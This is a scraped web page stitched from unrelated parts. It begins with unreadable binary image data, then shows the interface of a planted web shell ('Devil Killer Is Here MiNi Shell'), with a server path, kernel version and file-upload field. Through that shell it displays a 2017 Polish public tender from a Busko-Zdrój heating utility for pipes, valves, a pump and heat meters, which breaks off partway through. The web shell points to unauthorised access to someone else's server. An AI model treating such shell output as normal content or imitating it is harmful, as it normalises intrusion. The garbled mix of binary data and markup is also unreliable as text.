JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20170223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20170223/30674-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bip.ires.pl/kzc-ponidze/5976/5976/' target='_blank'>http://www.bip.ires.pl/kzc-ponidze/5976/5976/</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 30674 - 2017
              z dnia 2017-02-23 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Busko-Zdrój: Dostawa armatury, rur, pompy, kształtek, uszczelnień oraz liczników ciepła<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Komunalny Związek Ciepłownictwa "Ponidzie", krajowy numer identyfikacyjny
              290514837, ul.
              Osiedle Sikorskiego 
              42,
              28-100  
              Busko-Zdrój, woj.
              świętokrzyskie, państwo
              Polska, tel.
              41 3782789, e-mail
              sekretariat@kzcponidzie.pl, faks
              41 3782789.
              <br />
              Adres strony internetowej (URL): http://www.bip.ires.pl/kzc-ponidze/5976/5976/<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br />http://www.bip.ires.pl/kzc-ponidze/5976/5976/</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br />http://www.bip.ires.pl/kzc-ponidze/5976/5976/</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />oferty należy składać w formie pisemnej<br />
                Adres:
                <br />Komualny ZwiązekCiepłownictwa "Ponidzie" w Busku-Zdroju</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa armatury, rur, pompy, kształtek, uszczelnień oraz liczników ciepła<br /><b>Numer referencyjny: </b>DRIZP.271.2.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>			Załącznik nr 2 do SIWZ	
		I Część "Dostawa armatury, rur, pompy, kształtek, uszczelnień"		
Nr załącznika 	L.P.	Nazwa	J.M.	Ilość
23	1	Płyta uszczelkarska/szczeliwo, typu kryngielit    4 mm   max temp.  150°C, ciśn. 1,6	m2	6
23	2	Płyta uszczelkarska/szczeliwo, typu kryngielit    3 mm,   max temp.  150°C . C, ciśn 1,6	m2	8
37	3	Sznur teflonowy do pomp  6x 6, max temp. 150°C                   	kg	0,5
53//17	4	Uszczelka kanalizacyjna fi 110   	sztuki	4
126	5	Kurek manometryczny G1/2 P 1,6 Mpa, mosiądz temp. 150°C	szt.	1
82	6	Guma  20, zbrojona                                      	m2	2
13	7	Rura czarna stalowa bez szwu dł: 2200 mm DN 80  wymiary zewnętrzne: 88,9x5,0 mm	szt.	10
17	8	Rura czarna stalowa bez szwu Dn125   Średnica zewnętrzna 135mm, grubość ścinaki 4,5 mm	m	6
19	9	Sznur do uszczelnienia drzwiczek kotłów 3,5 cmx3cm  glinokrzemianu (ceramiczne) zbrojone inconelem	m	40
20	10	Sznur do uszczelnienia drzwiczek kotłów 2,5cmx2cm wykonany z glinokrzemianu (ceramiczne) zbrojone inconelem	m	20
24	11	Elastyczna rura aluminiowa typu  Spiro Dn200, 1 szt-przewód ściśnięty do 1m, rozciągający się do 3 m.	szt.	6
26	12	Rura stalowa czarna bez swu Dn 150  wymiary zewnętrzne: 159,0x4,0 mm	m	3
28	13	Rura czarna stalowa be szwu Dn 32 wymiary zewnetrzne: 42,4x3,2 mm	m	2
29	14	Rura stalowa czarna bez szwu Dn 15 wymiary zewnetrzne: 21,3x2,9 mm	m	15
30	15	Kolano stalowe czarne hamburskie do spawania Dn 15 , do 100°C	szt.	6
33	16	Wkład filtra siatkowego  Dn 125 	szt.	1
		Wymiar wkładu: 139x269 mm. Standardowe wykonanie filtra: 45oczek/1cm2		
34	17	Wkład filtra siatkowego  Dn 100 	szt.	4
		Wymiar wkładu: 118x212 mm. Standardowe wykonanie filtra: 45oczek/1cm2		
35	18	Wkład filtra siatkowego Dn 80 	szt.	4
		Wymiar wkładu: 97x183 mm. Standardowe wykonanie filtra: 45oczek/1cm2		
36	19	Wkład filtra siatkowego  Dn 65 	szt.	4
		Wymiar wkładu: 76x154 mm. Standardowe wykonanie filtra: 45oczek/1cm2		
37	20	Wkład filtra siatkowego firmy: Polna Dn 50 	szt.	4
		Wymiar wkładu: 61x119 mm. Standardowe wykonanie filtra: 45oczek/1cm2		
38	21	Otulina rur z pianki poliuretanowej -  Kolana 90 stopni (hamburskie),temperatura do 140 stopni, przewodnośc cieplna 0,03, grubość otuliny:45mm, średnica wewnętrzna otuliny:163 mm	szt.	2
39	22	Otulina rur z pianki poliuretanowej prosta na rurę, temperatura do 140 stopni, przewodnośc cieplna 0,03, grubość otuliny:45mm, średnica wewnętrzna otuliny:163 mm	m	3
40	23	Filtr do wody z płukaniem wstecznym DN50. opis parametów filtra w załączniku nr 1	szt.	2
41	24	"Zawór kulowy gwintowany wewnętrznie dn 50  PN16- Ciśnienie: 16 bar
- temperatura pracy: -20 do +120 stopni
-Uchwyt: dźwignia stalowa, nakładka na uchwyt: LDPE
- Powierzchnia: śrutowana niklowana
-  Przyłączenie: nakrętno-nakrętne
- Przelot: pełnoprzepływowy
- Element sterujący: kula chromowana
- Materiał: mosiądz
- uszczelnienie: PTFE
"	szt.	4
42	25	"Przepustnica miedzykołnierzowa z dżwignią ręczną dn 50 PN16.dysk: żeliwo sferoidalne GGG40 powlekane poliamidem,
- wykładzina: EPDM lub NBR (Nitryl), - korpus: żeliwo szare GG25 epoksydowane,
- przyłącza: międzykołnierzowe, max. temp pracy 100°C - napęd: dźwignia ręczna opis w załączniku nr 2"	szt.	2
43	26	 Kołnierz stalowy z szyjka do spawania dn 50 PN16 	szt.	2
44	27	"Przepustnica miedzykołnierzowa z dżwignią ręczną dn 125 PN16.dysk: żeliwo sferoidalne GGG40 powlekane poliamidem,
- wykładzina: EPDM lub NBR (Nitryl), - korpus: żeliwo szare GG25 epoksydowane,
- przyłącza: międzykołnierzowe, max. temp pracy 100°C, - napęd: dźwignia ręczna opis w załączniku nr 2"	szt.	4
45	28	Kołnierz stalowy z szyjka do spawania dn 125 PN16 	szt.	8
46	29	"Przepustnica miedzykołnierzowa z dżwignią ręczną dn 80 PN16.dysk: żeliwo sferoidalne GGG40 powlekane poliamidem,
- wykładzina: EPDM lub NBR (Nitryl), - korpus: żeliwo szare GG25 epoksydowane,
- przyłącza: międzykołnierzowe, max. temp pracy 100°C - napęd: dźwignia ręczna opis w załączniku nr 2"	szt.	1
47	30	Kołnierz stalowy z szyjka do spawania dn 80 PN16 	szt.	2
1/24z BZ	31	Manometr tarczowy cieczowy, zakres pomiaru 0-6 bar, rozmiar nominalny 100mm, przyłącze radialne (dolne) klasa dokładności 1.6; max. Temp. medium 90°C.Przyłącze procesowe G1/2.	szt.	2
4	32	Folia aluminiowa do izolacji wełny mineralnej (grubość 0,20mm) max temp. Stosowania 100°C	m2	17,5
6	33	Siatka do filtrów siatkowych do odmulaczy, ocynk , oczko 1x1mm	m2	2
7	34	Siatka  do filtrów siatkowych do odmulaczy, ocynk ,oczko 1x0,5mm	m2	1
12//2	35	Odpowietrzniki z zaworem stopowym do instalacji c.o., dn 15,  maksymalna temperatura:  110°C,  max. Cis 1,0MPa	szt.	10
15	36	Regulator cyfrowy instalacji grzewczych i ciepłowniczych kompatybilny z zaworami reulacyjnymi wyposażonymi w siłowniki elektryczne z serii  5857 Samson,regulator musi być kompatybilny z systemem telemetrii Samosn Administrar . Regulator musi zapewniać sterowanie obiegiem c.o i c.w.u., możliwość regulacji większej ilości obiegów regulacyjnych poprez podłączenie dalszych regulatorów, regulator musi być wyposażony w  podświetlany wyświelacz, np. regulator typu Trovis 5576. 	szt.	1
24	37	Membranowy zawór bezpieczeństwa,   DN 32/40,  zakres temp. do 140°C, ciśn. do 4,5 Bar, ac=0,32 np. typu 1915	szt.	1
26	38	Pasta do uszczelniania gwintów (460G)	szt.	2
28	39	"Taśma teflonowa,  Grubość: 0,10 mm
Szerokość: 12 mm
Długość: 12 mb"	szt.	2
42	40	Środek w sprayu o działaniu smarującym i wypierającym wodę  Preparat w aerozolu, 400 ml 	szt.	2
50	41	Olej silikonowy w sprayu lub tubce do smarowania trzpieni zaworów (300 ml)	szt.	1
57	42	"Pompa samozasysająca o mocy silnika 1,5 kW, spełniająca funkcje stabilizacji ciśnienia w układzie ciepłowniczym z łożyskiem kulkowym po stronie ssącej i tłocznej, typowielkość pompy -4 , ilość stopni pompy-3, wykonanie materiałowe - 3  człony -żeliwo szare , wirniki- brąz cynowy, wał- stal nierdzewna. Pompa wg załączonego rysunku,  z uszczelnieniem sznurowym do cieczy, o temperaturze od -30°C do +70°C. Kompletność dostawy - z silnikiem i ze sprzęgłem i płytą fundamentową.   np. pompa typu SKA 3.02.1.10.10.   
Q  =1-3 m3/h
Hp =64-17 m H2O  
n = 1400 obr/min. Załącznik  nr 3
"	szt.	1
100	43	"Zawór regulacyjny np. typu 4, DN 20; korpus z żeliwa szarego EN-JL1040 / A 126B;
PN 16; Kołnierze z listwą uszczelniającą, forma B DIN
Zawór regulacyjny np. typu 4 , EN 1092-2; gniazdo ze stali 1.4104; grzyb ze stali
1.4112; dop. temperatura 220°C / 430 °F; mieszek
odciążający ze stali CrNiMo; współczynnik Kvs 6,3 /
współczynnik Cv 7,5; maks. dop. różnica ciśnień 25
bar / jeżeli PN jest mniejsze, to maks. PN
"	szt.	1
101	44	"Termostat np. typu 2231, wielkość 150; zakres wartości zadanej 20...120°C;
czujnik PN 40 / Class 150; złączka dwustronna G 1;
głębokość zanurzenia 290 mm; czujnik z brązu,
niklowany; rurka łącząca z miedzi, niklowana; długość
3m"	szt.	1
102	45	Regulator ciśnienia bezpośredniego działania np. typu 41-23 wraz z kompletnym wyposażeniem	szt.	1
103	46	"Zawór zamykający np. typu 2112 Dn20 , Pn 16 , DN 20; korpus z żeliwa szarego EN-JL1040 / A 126B;
PN 16; kołnierze z listwą uszczelniającą, forma B, DIN
EN 1092-2; gniazdo ze stali 1.4104; krawędź
uszczelniająca grzyba metalowa utwardzana; grzyb ze
stali 1.4112; zakres sprężyny 4400 N; mieszek
odciążający ze stali CrNiMo; dop. różnica ciśnień 25
bar / jeżeli PN jest mniejsze, to maks. PN;
współczynnik Kvs 6,3 / współczynnik Cv 7,5"	szt.	1
104	47	"Siłownik do zaworu j.w.np. typu 2413 zakres 0,05 -0.25 bar, DN 15...100 / 1/2""...4""; zakres wartości zadanej 0,05
... 0,25 bar / 0,75 ... 3,5 psi; powierzchnia membrany
640 cm / 100 sq. in; membrana z EPDM"	szt.	1

II Część 
Dostawa liczników ciepła.

1.	Zgodność elementów do ciepłomierzy z:
-  Normą PN-EN 1434;
     - Ustawą z dnia 11 maja 2001r. Prawo o miarach (jednolity tekst Dz. U.  
        z 2016r. poz. 884,1948.);
- Ustawą z dnia 15 grudnia 2006r. o zmianie ustawy o systemie oceny zgodności oraz o zmianie niektórych innych ustaw (Dz. U. z 2006r. Nr 249, poz. 1834);
- Rozporządzeniem Ministra Gospodarki z dnia 21 grudnia 2007r. w sprawie wymagań, którym powinny odpowiadać ciepłomierze i ich podzespoły, oraz szczegółowego zakresu sprawdzeń wykonywanych podczas prawnej kontroli metrologicznej tych przyrządów pomiarowych (Dz. U. z 2008r. Nr 2 poz. 2);
- Rozporządzeniem Ministra Gospodarki z dnia 27 grudnia 2007r. w sprawie rodzajów przyrządów pomiarowych podlegających prawnej kontroli metrologicznej oraz zakresu tej kontroli (Dz. U. z 2008r. Nr 3, poz. 13);
- Rozporządzeniem Ministra Gospodarki z dnia 7 stycznia 2008r. w sprawie  prawnej kontroli metrologicznej przyrządów pomiarowych (Dz. U. z 2008r. Nr 5, poz.29);

2.	Oferowane ciepłomierze ultradźwiękowe muszą być przyrządami nowymi fabrycznie i będącymi rozdzielnymi zestawami elementów składowych: przelicznika, przetwornika przepływu i pary czujników. 
3.	Ciepłomierze oraz podzespoły do  ciepłomierzy (przelicznik wskazujący, przetwornik przepływu, para czujników temperatury) muszą być wprowadzone do obrotu lub użytkowania po dokonaniu oceny zgodności z zasadniczymi wymaganiami na podstawie ustawy z dnia 30 sierpnia 2002 r. o systemie oceny zgodności (jednolity tekst Dz. U. z 2004 r. Nr 204, poz. 2087) oraz ustawy z dnia 15 grudnia 2006 r. o zmianie ustawy o systemie oceny zgodności .  Wszystkie z wyżej wymienionych części składowych muszą posiadać wydane przez uprawnioną jednostkę notyfikowaną oddzielne certyfikaty badania typu.
4.	Elementy składowe ciepłomierza posiadające zatwierdzenie typu muszą być zalegalizowane, a cecha roczna musi być z danego roku dostawy. Elementy muszą posiadać legalizację na okres 5 lat od daty produkcji.
5.	Wykonawca zapewnia serwis dostępny  w niżej wymienionych zakresach i czasach:
	zmiana impulsowania przelicznika - do 5 dni roboczych,
	zmiana sposobu zabudowy (zasilania/powrót)  do 5 dni roboczych,
	kasowanie błędów do 5 dni roboczych,
	wymiana baterii - do 5 dni roboczych,
	legalizacja poserwisowa  do 7 dni roboczych,
	naprawa lub wymiana uszkodzonego licznika lub jego elementu  - do 5 dni roboczych.
6.	Ciepłomierze muszą być wyposażone moduł M-BUS oraz opcjonalnie ( dopuszcza się dostarczenie kart osobno)w karty radiowe do odczytów liczników w systemie radiowym. 
7.	Zakres pomiaru temperatur przez ciepłomierz co najmniej 5-150 C.
8.	Pomiar temperatur czujnikami Pt 500. 
9.	Stopień ochrony obudowy min. IP 54;
10.	Ciepłomierz muszą posiadać złącze (gniazdo lub głowicę optyczną)  umożliwiające komunikację  z urządzeniem.
11.	Zabudowa rozłączna ciepłomierzy   montaż przelicznika  naścienny; możliwość montażu przeliczników na przetworniku przepływu bez dodatkowych elementów pośredniczących.
12.	Elementy do ciepłomierza i wodomierza powinny posiadać dokumentację techniczno-ruchową (DTR) i kartę katalogową w języku polskim.
13.	Do liczników należy dostarczyć osłony czujników kablowych ze stali kwasoodpornej. Nie dopuszcza się osłon z mosiądzu oraz tworzyw sztucznych.
14.	Żywotność baterii w przeliczniku oraz wodomierzu min. 10 lat.
15.	Wymagane parametry dostępne na wyświetlaczu przelicznika LCD:
a)	zużycie energii cieplnej w GJ,
b)	objętość wody sieciowej,
c)	przepływ chwilowy m3/h; l/h,
d)	moc chwilowa kW, MW,
e)	data i czas,
f)	kody błędu,
g)	szczytowe wartości mocy i przepływu z datą ich wystąpienia,
h)	chwilowe wartości temperatury zasilania i powrotu.
16.	Przelicznik musi posiadać rejestrator danych w zakresie:
a)	Rejestr roczny, miesięczny, dobowy, godzinowy oraz rejestr błędów.
17.	W przypadku przetworników gwintowanych należy dostarczyć komplet półsrubunków do montażu.
18.	W przypadku przetworników kołnierzowych należy dostarczyć komplet kołnierzy przeciwstawnych do montażu.



II. Zestawienie liczników ciepła i wodomierzy:


L.P.	Nazwa urządzenia	Opis urządzenia	J.M.	Ilość
1	Licznik ciepła	Ultradźwiękowy przetwornik przepływu, Qp= 25m3/h, DN 65  PN 25 ,przelicznik z wyświetlaczem, para czujników min. 3 mb. , tuleje do PT 500 90mm stal nierdzewna. Przetwornik montowany na powrocie, dł. Zabudowy 300 mm + M-BUS	Kpl.	5
2	Licznik ciepła	Ultradźwiękowy przetwornik przepływu, Qp= 60m3/h,  PN 25, DN 100 , przelicznik z wyświetlaczem, para czujników min. 3 mb.  tuleje do PT 500 90mm.  Przetwornik montowany na powrocie. dł. Zabudowy 360 mm + M-BUS	Kpl.	1
3	Licznik ciepła	Ultradźwiękowy przetwornik przepływu, Qp=6m3/h,  G1 1 /4 B (R1) PN16 tuleje do PT  500 65mm,  PN 16 , przelicznik z wyświetlaczem, para czujników min. 3 mb. Przetwornik montowany na powrocie. dł. Zabudowy 260 mm + M-BUS	Kpl.	1
4	Licznik ciepła	Ultradźwiękowy przetwornik przepływu, Qp=150m3/h,  DN 150, tuleje do PT  500 140mm,  PN 25 , przelicznik z wyświetlaczem, para czujników min. 3 mb. Przetwornik montowany na powrocie. dł. Zabudowy 500 mm + M-BUS	Kpl.	1



<br /><br /><b>II.5) Główny kod CPV: </b>42130000-9<br /><b> Dodatkowe kody CPV:</b>42124290-3,
                44160000-9,
                44425200-7,
                42122430-3,
                38425100-1,
                42131130-6,
                38412000-6,
                38551000-2,
                38550000-5<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 28/04/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Na potwierdzenie należy złożyć oświadczenie zgodnie  z założeniami w pkt. 9.3.SIWZ -Zamawijący nie stawia w tym zakresie żadnych wymagań<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Na potwierdzenie należy złożyć oświadczenie zgodnie  z założeniami w pkt. 9.3.SIWZ  -Zamawijący nie stawia w tym zakresie żadnych wymagań<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                wykaz wykonanych dostaw
